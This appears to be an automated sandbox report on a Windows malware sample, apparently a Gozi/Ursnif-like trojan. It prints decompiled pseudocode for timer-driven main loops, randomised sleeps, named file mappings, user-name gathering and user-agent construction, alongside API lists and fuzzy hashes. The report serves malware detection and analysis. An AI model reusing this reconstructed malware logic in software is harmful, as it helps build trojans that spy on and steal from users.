Part of subcall function 00F933FA: lstrlen.KERNEL32(?,00F9A380,74E47FC0,00000000,00F92788,?,?,?,?,?,00F93EAC,?), ref: 00F93403
Part of subcall function 00F933FA: mbstowcs.NTDLL ref: 00F9342A
Part of subcall function 00F933FA: memset.NTDLL ref: 00F9343C

wcstombs.NTDLL ref: 00F9704E

Part of subcall function 00F91671: SysAllocString.OLEAUT32(00000000), ref: 00F916B2
Part of subcall function 00F91671: IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,00000000), ref: 00F91734
Part of subcall function 00F91671: StrStrIW.SHLWAPI(00000000,006E0069), ref: 00F91773

Part of subcall function 00F92A03: RtlFreeHeap.NTDLL(00000000,00000000,00F94072,00000000,?,?,00000000,?,?,?,?,?,?,00F944AE,00000000), ref: 00F92A0F

RtlFreeHeap.NTDLL(00000000,?,00000000), ref: 00F9708F
RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 00F9709F
RtlFreeHeap.NTDLL(00000000,00000000,?,040A9630), ref: 00F970AF
HeapFree.KERNEL32(00000000,?), ref: 00F970BF
RtlFreeHeap.NTDLL(00000000,?), ref: 00F970CD

Strings

Ut, xrefs: 00F9708F, 00F9709F, 00F970AF, 00F970BF, 00F970CD

Memory Dump Source

Source File: 00000001.00000002.810340952.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.810321795.0000000000F90000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810445470.0000000000F99000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810494847.0000000000F9A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810512763.0000000000F9C000.00000002.00020000.sdmp Download File

Similarity

API ID: Heapwsprintf$Free$lstrlen$lstrcat$CountCriticalSectionTickTrimlstrcpy$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
String ID: Ut
API String ID: 2871901346-8415677
Opcode ID: 96bd790e1a73b40d3ffc8b5ef5e4bd41614b2a5cc3f0215c588574ab6b618332
Instruction ID: 5de689bdb212c2ce20b58ad84e68c014326b42214ef0b6e95149e690e0c84f7d
Opcode Fuzzy Hash: 96bd790e1a73b40d3ffc8b5ef5e4bd41614b2a5cc3f0215c588574ab6b618332
Instruction Fuzzy Hash: 2BA15971900219AFDF11DFA8DC89EAA3BA9FF48350F154026F819C7231D7369954EFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F91B47, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 149
timememoryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00F91B47(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t61;
				long _t65;
				signed int _t66;
				void* _t69;
				void* _t71;
				signed int _t72;
				intOrPtr _t74;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t74 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0xf9a298);
					_v20 = 0;
					_v16 = 0;
					L00F97F56();
					_v36.LowPart = _t46;
					_v32 = _t74;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0xf9a2c4; // 0x284
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0xf9a2a4 = 5;
						} else {
							_t69 = E00F94A3C(_t74); // executed
							if(_t69 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0xf9a2b8 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t72 = _v12;
						_t58 = _t72 << 4;
						_t76 = _t80 + (_t72 << 4) - 0x54;
						_t73 = _t72 + 1;
						_v24 = _t72 + 1;
						_t61 = E00F9243C( &_v20, _t73, _t73, _t80 + _t58 - 0x58, _t76,  &_v16); // executed
						_v8.LowPart = _t61;
						if(_t61 != 0) {
							goto L17;
						}
						_t66 = _v24;
						_t90 = _t66 - 3;
						_v12 = _t66;
						if(_t66 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E00F97289(_t73, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t61 - 0x10d2;
						if(_t61 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0xf9a29c);
							goto L21;
						} else {
							__eflags =  *0xf9a2a0; // 0xa
							if(__eflags == 0) {
								goto L12;
							} else {
								_t61 = E00F92813();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0xf9a2a0);
								L21:
								L00F97F56();
								_v36.LowPart = _t61;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
								_t65 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								__eflags = _t65;
								_v8.LowPart = _t65;
								if(_t65 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t71 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0xf9a290, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t71 = _t71 - 1;
					} while (_t71 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}

0x00f91b47
0x00f91b59
0x00f91b5c
0x00f91b68
0x00f91b70
0x00f91b73
0x00f91cd9
0x00f91b79
0x00f91b79
0x00f91b7b
0x00f91b80
0x00f91b81
0x00f91b87
0x00f91b8a
0x00f91b8d
0x00f91b9b
0x00f91ba6
0x00f91ba9
0x00f91bab
0x00f91bb8
0x00f91bc2
0x00f91bc6
0x00f91bc9
0x00f91bce
0x00f91bd9
0x00f91bd9
0x00f91bd0
0x00f91bd0
0x00f91bd7
0x00000000
0x00000000
0x00f91bd7
0x00f91be3
0x00000000
0x00f91be6
0x00f91bea
0x00f91bf5
0x00f91bf5
0x00f91bfc
0x00f91c01
0x00f91c08
0x00f91c11
0x00f91c17
0x00f91c1a
0x00f91c21
0x00f91c24
0x00000000
0x00000000
0x00f91c26
0x00f91c29
0x00f91c2c
0x00f91c2f
0x00000000
0x00f91c31
0x00f91c40
0x00f91c40
0x00000000
0x00f91c6e
0x00f91c6e
0x00f91c73
0x00f91c92
0x00f91c94
0x00f91c99
0x00f91c9a
0x00000000
0x00f91c75
0x00f91c75
0x00f91c7b
0x00000000
0x00f91c7d
0x00f91c7d
0x00f91c82
0x00f91c84
0x00f91c89
0x00f91c8a
0x00f91ca0
0x00f91ca0
0x00f91ca8
0x00f91cb3
0x00f91cb6
0x00f91cc1
0x00f91cc3
0x00f91cc5
0x00f91cc8
0x00000000
0x00f91cce
0x00000000
0x00f91cce
0x00f91cc8
0x00f91c7b
0x00000000
0x00f91c73
0x00f91c43
0x00f91c45
0x00f91c48
0x00f91c49
0x00f91c49
0x00f91c4d
0x00f91c57
0x00f91c57
0x00f91c5d
0x00f91c60
0x00f91c60
0x00f91c66
0x00f91c66
0x00f91ce3
0x00000000

APIs

memset.NTDLL ref: 00F91B5C
CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 00F91B68
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 00F91B8D
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 00F91BA9
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00F91BC2
HeapFree.KERNEL32(00000000,00000000), ref: 00F91C57
CloseHandle.KERNEL32(?), ref: 00F91C66
_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 00F91CA0
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,00F92F7D), ref: 00F91CB6
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00F91CC1

Part of subcall function 00F94A3C: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,040A9338,00000000,?,74E5F710,00000000,74E5F730), ref: 00F94A8B
Part of subcall function 00F94A3C: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,040A9370,?,00000000,30314549,00000014,004F0053,040A932C), ref: 00F94B28
Part of subcall function 00F94A3C: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00F91BD5), ref: 00F94B3A

GetLastError.KERNEL32 ref: 00F91CD3

Strings

Ut, xrefs: 00F91C57

Memory Dump Source

Source File: 00000001.00000002.810340952.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.810321795.0000000000F90000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810445470.0000000000F99000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810494847.0000000000F9A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810512763.0000000000F9C000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
String ID: Ut
API String ID: 3521023985-8415677
Opcode ID: 1ddd10d6807f5863d93661746eb89be7f1e90fe4c9d2a367393533b787ae894c
Instruction ID: c61b4ee4905e431c746dbb99588f9feb55021e6168b7da2c5dbdd033606f6051
Opcode Fuzzy Hash: 1ddd10d6807f5863d93661746eb89be7f1e90fe4c9d2a367393533b787ae894c
Instruction Fuzzy Hash: C9518871D0522AAEEF11DF95DC44DEEBBB9FF49320F204126F414A21A0D7758A40EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F94430, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
sleepmemorytimeCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00F94430(void* __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				char _v32;
				long _v40;
				void* _t14;
				void* _t16;
				int _t18;
				signed int _t20;
				void* _t22;
				signed int _t23;
				intOrPtr _t25;
				unsigned int _t29;
				void* _t33;
				signed int _t40;

				_t33 = __edx;
				_t14 = HeapCreate(0, 0x400000, 0); // executed
				 *0xf9a290 = _t14;
				if(_t14 != 0) {
					 *0xf9a180 = GetTickCount();
					_t16 = E00F92A18(_a4);
					if(_t16 != 0) {
						L10:
						return _t16;
					} else {
						goto L3;
					}
					do {
						L3:
						GetSystemTimeAsFileTime( &_v12);
						_t18 = SwitchToThread();
						_t29 = _v12.dwHighDateTime;
						_t20 = (_t29 << 0x00000020 | _v12.dwLowDateTime) >> 7;
						_push(0);
						_push(9);
						_push(_t29 >> 7);
						_push(_t20);
						L00F980B2();
						_t40 = _t18 + _t20;
						_t22 = E00F93F5D(_a4, _t40);
						_t23 = 2;
						Sleep(_t23 << _t40); // executed
					} while (_t22 == 1);
					_t25 =  *0xf9a2ac; // 0x288
					_v32 = 0;
					if(_t25 != 0) {
						__imp__(_t25,  &_v32);
						if(_t25 == 0) {
							_v40 = 0;
						}
						if(_v40 != 0) {
							 *0xf9a2b8 = 1; // executed
						}
					}
					_t16 = E00F92D63(_t33); // executed
					goto L10;
				}
				_t16 = 8;
				goto L10;
			}

0x00f94430
0x00f94445
0x00f9444d
0x00f94452
0x00f94465
0x00f9446a
0x00f94471
0x00f944f9
0x00f944ff
0x00000000
0x00000000
0x00000000
0x00f94477
0x00f94477
0x00f9447c
0x00f94482
0x00f94488
0x00f94492
0x00f94496
0x00f94497
0x00f9449c
0x00f9449d
0x00f9449e
0x00f944a3
0x00f944a9
0x00f944b2
0x00f944b8
0x00f944be
0x00f944c3
0x00f944ca
0x00f944ce
0x00f944d6
0x00f944de
0x00f944e0
0x00f944e0
0x00f944e8
0x00f944ea
0x00f944ea
0x00f944e8
0x00f944f4
0x00000000
0x00f944f4
0x00f94456
0x00000000

APIs

HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 00F94445
GetTickCount.KERNEL32 ref: 00F9445C
GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001), ref: 00F9447C
SwitchToThread.KERNEL32(?,00000001), ref: 00F94482
_aullrem.NTDLL(?,?,00000009,00000000), ref: 00F9449E
Sleep.KERNELBASE(00000002,00000000,?,00000001), ref: 00F944B8
IsWow64Process.KERNEL32(00000288,?,?,00000001), ref: 00F944D6

Strings

Tt, xrefs: 00F94445

Memory Dump Source

Source File: 00000001.00000002.810340952.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.810321795.0000000000F90000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810445470.0000000000F99000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810494847.0000000000F9A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810512763.0000000000F9C000.00000002.00020000.sdmp Download File

Similarity

API ID: Time$CountCreateFileHeapProcessSleepSwitchSystemThreadTickWow64_aullrem
String ID: Tt
API String ID: 3690864001-3291821022
Opcode ID: 8f649080cf38192d9458d5859268a4628e18af8ff2eef7f627f6337eec8813fc
Instruction ID: 703066a2cc0ed3f95b948ab3e68285f9a42a0caf4b9c40227abe5455034558af
Opcode Fuzzy Hash: 8f649080cf38192d9458d5859268a4628e18af8ff2eef7f627f6337eec8813fc
Instruction Fuzzy Hash: 2121A8B2904208AFEF20DF79DC89F2A77E8BB54360F00452EF555C21A1E7759845EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 10001979, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E10001979(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L10002210();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x100041d0;
				_push(_t15 + 0x1000505e);
				_push(_t15 + 0x10005054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L1000220A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x100041c0, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x10001979
0x10001982
0x10001986
0x1000198c
0x10001991
0x10001996
0x10001999
0x1000199c
0x100019a1
0x100019a2
0x100019a5
0x100019b0
0x100019b7
0x100019bb
0x100019bd
0x100019be
0x100019c1
0x100019c6
0x100019d0
0x100019d2
0x100019d2
0x100019e6
0x100019ec
0x100019f0
0x10001a40
0x100019f2
0x100019fb
0x10001a11
0x10001a19
0x10001a2b
0x10001a2f
0x00000000
0x00000000
0x10001a1b
0x10001a1e
0x10001a23
0x10001a25
0x10001a25
0x10001a06
0x10001a08
0x10001a31
0x10001a32
0x10001a32
0x100019fb
0x10001a48

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,1000176E,0000000A,?,?), ref: 10001986
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 1000199C
_snwprintf.NTDLL ref: 100019C1
CreateFileMappingW.KERNELBASE(000000FF,100041C0,00000004,00000000,?,?), ref: 100019E6
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,1000176E,0000000A,?), ref: 100019FD
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 10001A11
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,1000176E,0000000A,?), ref: 10001A29
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,1000176E,0000000A), ref: 10001A32
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,1000176E,0000000A,?), ref: 10001A3A

Memory Dump Source

Source File: 00000001.00000002.813406704.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.813385466.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.813421377.0000000010005000.00000040.00020000.sdmp Download File

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1724014008-0
Opcode ID: 73fdbbed011ea5ad313a47bb3d0880da75e3679d1784bab261cc02851e7121c3
Instruction ID: 6370643cb4eae1a4f3621eee97f40527c8ec301770f17fee856c827e2c33f9c2
Opcode Fuzzy Hash: 73fdbbed011ea5ad313a47bb3d0880da75e3679d1784bab261cc02851e7121c3
Instruction Fuzzy Hash: D821B0B2601218BFE711DFA8DCC5EDF77ACEB493D4F118066FA11D7158D67099408B61

Uniqueness

Uniqueness Score: -1.00%

Function 00F957AD, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00F957AD(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L00F97F50();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0xf9a2d0; // 0x310d5a8
				_t5 = _t13 + 0xf9b84d; // 0x40a8df5
				_t6 = _t13 + 0xf9b580; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L00F97C2A();
				_t17 = CreateFileMappingW(0xffffffff, 0xf9a2d4, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}

0x00f957ad
0x00f957b5
0x00f957b9
0x00f957bf
0x00f957c4
0x00f957c9
0x00f957cc
0x00f957cf
0x00f957d4
0x00f957d5
0x00f957d8
0x00f957dd
0x00f957e4
0x00f957ee
0x00f957f0
0x00f957f1
0x00f957f4
0x00f95810
0x00f95816
0x00f9581a
0x00f95868
0x00f9581c
0x00f95829
0x00f95839
0x00f95841
0x00f95853
0x00f95857
0x00000000
0x00000000
0x00f95843
0x00f95846
0x00f9584b
0x00f9584d
0x00f9584d
0x00f9582b
0x00f9582d
0x00f95859
0x00f9585a
0x00f9585a
0x00f95829
0x00f9586f

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,00F92DF9,?,00000001,?), ref: 00F957B9
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00F957CF
_snwprintf.NTDLL ref: 00F957F4
CreateFileMappingW.KERNELBASE(000000FF,00F9A2D4,00000004,00000000,00001000,?), ref: 00F95810
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F92DF9,?), ref: 00F95822
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00F95839
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F92DF9), ref: 00F9585A
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F92DF9,?), ref: 00F95862

Memory Dump Source

Source File: 00000001.00000002.810340952.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.810321795.0000000000F90000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810445470.0000000000F99000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810494847.0000000000F9A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810512763.0000000000F9C000.00000002.00020000.sdmp Download File

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1814172918-0
Opcode ID: fe053a5af251f2ab4e74907591ee93dfbf70a98af79d877ab28cbf3ae5a342f2
Instruction ID: 9e25a8c2b7bac2a8b1afec98ae1628c6ac4ed021e692bd6d6d11c9186ef80a9b
Opcode Fuzzy Hash: fe053a5af251f2ab4e74907591ee93dfbf70a98af79d877ab28cbf3ae5a342f2
Instruction Fuzzy Hash: D7210A72A05208FBEB119B68DC05F9D37B9AF44B50F250069F615E71E0D7B1D905FB60

Uniqueness

Uniqueness Score: -1.00%

Function 00F92D63, Relevance: 10.7, APIs: 7, Instructions: 191
memoryCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00F92D63(signed int __edx) {
				signed int _v8;
				long _v12;
				signed int _v16;
				long _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				void* __edi;
				void* __esi;
				void* _t27;
				long _t28;
				long _t31;
				intOrPtr _t32;
				void* _t36;
				signed int _t37;
				intOrPtr _t38;
				void* _t39;
				CHAR* _t41;
				long _t47;
				long _t48;
				void* _t53;
				void* _t55;
				intOrPtr _t63;
				void* _t66;
				long _t70;
				void* _t71;
				signed char _t73;
				intOrPtr _t75;
				signed int _t76;
				long _t81;
				long _t83;
				CHAR* _t86;
				void* _t87;

				_t78 = __edx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				_t27 = E00F95901();
				if(_t27 != 0) {
					_t76 =  *0xf9a2b4; // 0x2000000a
					_t72 = (_t76 & 0xf0000000) + _t27;
					 *0xf9a2b4 = (_t76 & 0xf0000000) + _t27;
				}
				_t28 =  *0xf9a14c(0, 2); // executed
				_v20 = _t28;
				if(_t28 == 0 || _t28 == 1 || _t28 == 0x80010106) {
					_t31 = E00F94097( &_v8,  &_v16); // executed
					_push(0);
					_t83 = _t31;
					_t32 =  *0xf9a2d0; // 0x310d5a8
					_push(0xf9a2d8);
					_push(1);
					_t7 = _t32 + 0xf9b5bc; // 0x4d283a53
					 *0xf9a2d4 = 0xc;
					 *0xf9a2dc = 0;
					L00F95EC2();
					_t36 = E00F957AD(_t78,  &_v24,  &_v12); // executed
					if(_t36 == 0) {
						CloseHandle(_v24);
					}
					if(_t83 != 5) {
						_t37 = _v16;
						__eflags = _t37;
						if(_t37 != 0) {
							E00F93946(_t37 ^ 0xe8fa7dd7,  &_v40);
							_t86 = E00F95C4E(0x27);
							__eflags = _t86;
							if(_t86 != 0) {
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								_t63 =  *0xf9a2d0; // 0x310d5a8
								_t18 = _t63 + 0xf9b916; // 0x78383025
								wsprintfA(_t86, _t18, _v40, _v36, _v32, _v28);
								_t87 = _t87 + 0x18;
							}
							 *0xf9a328 = _t86;
						}
						_t38 = E00F92304();
						 *0xf9a2c8 =  *0xf9a2c8 ^ 0xe8fa7dd7;
						 *0xf9a318 = _t38;
						_t39 = E00F95C4E(0x60);
						__eflags = _t39;
						 *0xf9a37c = _t39;
						if(_t39 == 0) {
							_t83 = 8;
						} else {
							memset(_t39, 0, 0x60);
							_t53 =  *0xf9a37c; // 0x40a9630
							_t87 = _t87 + 0xc;
							__imp__(_t53 + 0x40);
							_t55 =  *0xf9a37c; // 0x40a9630
							 *_t55 = 0xf9b882;
							_t83 = 0;
						}
						__eflags = _t83;
						if(_t83 == 0) {
							_t41 = RtlAllocateHeap( *0xf9a290, _t83, 0x52);
							__eflags = _t41;
							 *0xf9a310 = _t41;
							if(_t41 == 0) {
								_t83 = 8;
							} else {
								_t73 =  *0xf9a2b4; // 0x2000000a
								_t78 = _t73 & 0x000000ff;
								_t75 =  *0xf9a2d0; // 0x310d5a8
								_t19 = _t75 + 0xf9b212; // 0x697a6f4d
								_t72 = _t19;
								wsprintfA(_t41, _t19, _t73 & 0x000000ff, _t73 & 0x000000ff, 0xf992c7);
							}
							__eflags = _t83;
							if(_t83 == 0) {
								asm("sbb eax, eax");
								E00F93946( ~_v8 &  *0xf9a2c8, 0xf9a00c); // executed
								_t83 = E00F9374B(_t72);
								__eflags = _t83;
								if(_t83 != 0) {
									goto L31;
								}
								_t47 = E00F93E8F(_t72); // executed
								__eflags = _t47;
								if(_t47 != 0) {
									__eflags = _v8;
									_t81 = _v12;
									if(_v8 != 0) {
										L30:
										_t48 = E00F91B47(_t78, _t81, _v8); // executed
										_t83 = _t48;
										goto L31;
									}
									__eflags = _t81;
									if(__eflags == 0) {
										goto L31;
									}
									_t23 = _t81 + 4; // 0x5
									_t83 = E00F95D26(__eflags, _t23);
									__eflags = _t83;
									if(_t83 == 0) {
										goto L31;
									}
									goto L30;
								}
								_t83 = 8;
							}
						}
					} else {
						_t70 = _v12;
						if(_t70 == 0) {
							L31:
							if(_v20 == 0 || _v20 == 1) {
								E00F9A150();
							}
							goto L35;
						}
						_t71 = _t70 + 4;
						do {
							_push(1);
							_push(_t71);
							_t66 = 5;
						} while (E00F963CD(_t66, 0) == 0x4c7);
					}
					goto L31;
				} else {
					_t83 = _t28;
					L35:
					return _t83;
				}
			}

0x00f92d63
0x00f92d6e
0x00f92d71
0x00f92d74
0x00f92d77
0x00f92d7e
0x00f92d80
0x00f92d8c
0x00f92d8e
0x00f92d8e
0x00f92d97
0x00f92d9f
0x00f92da2
0x00f92dbc
0x00f92dc1
0x00f92dc2
0x00f92dc4
0x00f92dc9
0x00f92dce
0x00f92dd0
0x00f92dd7
0x00f92de1
0x00f92de7
0x00f92df4
0x00f92dfb
0x00f92e00
0x00f92e00
0x00f92e09
0x00f92e32
0x00f92e35
0x00f92e42
0x00f92e49
0x00f92e55
0x00f92e57
0x00f92e59
0x00f92e5e
0x00f92e64
0x00f92e6a
0x00f92e70
0x00f92e73
0x00f92e78
0x00f92e80
0x00f92e82
0x00f92e82
0x00f92e85
0x00f92e85
0x00f92e8b
0x00f92e90
0x00f92e98
0x00f92e9d
0x00f92ea2
0x00f92ea4
0x00f92ea9
0x00f92ed8
0x00f92eab
0x00f92eb0
0x00f92eb5
0x00f92eba
0x00f92ec1
0x00f92ec7
0x00f92ecc
0x00f92ed2
0x00f92ed2
0x00f92ed9
0x00f92edb
0x00f92eea
0x00f92ef0
0x00f92ef2
0x00f92ef7
0x00f92f23
0x00f92ef9
0x00f92ef9
0x00f92eff
0x00f92f0c
0x00f92f12
0x00f92f12
0x00f92f1a
0x00f92f1c
0x00f92f24
0x00f92f26
0x00f92f2d
0x00f92f3a
0x00f92f44
0x00f92f46
0x00f92f48
0x00000000
0x00000000
0x00f92f4a
0x00f92f4f
0x00f92f51
0x00f92f58
0x00f92f5c
0x00f92f5f
0x00f92f74
0x00f92f78
0x00f92f7d
0x00000000
0x00f92f7d
0x00f92f61
0x00f92f63
0x00000000
0x00000000
0x00f92f65
0x00f92f6e
0x00f92f70
0x00f92f72
0x00000000
0x00000000
0x00000000
0x00f92f72
0x00f92f55
0x00f92f55
0x00f92f26
0x00f92e0b
0x00f92e0b
0x00f92e10
0x00f92f7f
0x00f92f83
0x00f92f8b
0x00f92f8b
0x00000000
0x00f92f83
0x00f92e16
0x00f92e19
0x00f92e19
0x00f92e1b
0x00f92e1e
0x00f92e26
0x00f92e2d
0x00000000
0x00f92f93
0x00f92f93
0x00f92f96
0x00f92f9b
0x00f92f9b

APIs

Part of subcall function 00F95901: GetModuleHandleA.KERNEL32(4C44544E,00000000,00F92D7C,00000000,00000000,00000000,?,?,?,?,?,00F944F9,?,00000001), ref: 00F95910

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(4D283A53,00000001,00F9A2D8,00000000), ref: 00F92DE7
CloseHandle.KERNEL32(?,?,00000001,?,?,?,?,?,?,?,00F944F9,?,00000001), ref: 00F92E00
wsprintfA.USER32 ref: 00F92E80
memset.NTDLL ref: 00F92EB0
RtlInitializeCriticalSection.NTDLL(040A95F0), ref: 00F92EC1
RtlAllocateHeap.NTDLL(00000008,00000052,00000060), ref: 00F92EEA
wsprintfA.USER32 ref: 00F92F1A

Part of subcall function 00F93946: GetUserNameW.ADVAPI32(00000000,00F92F3F), ref: 00F9397D
Part of subcall function 00F93946: RtlAllocateHeap.NTDLL(00000000,00F92F3F), ref: 00F93994
Part of subcall function 00F93946: GetUserNameW.ADVAPI32(00000000,00F92F3F), ref: 00F939A1
Part of subcall function 00F93946: HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,00F92F3F,?,?,?,?,?,00F944F9,?,00000001), ref: 00F939C2
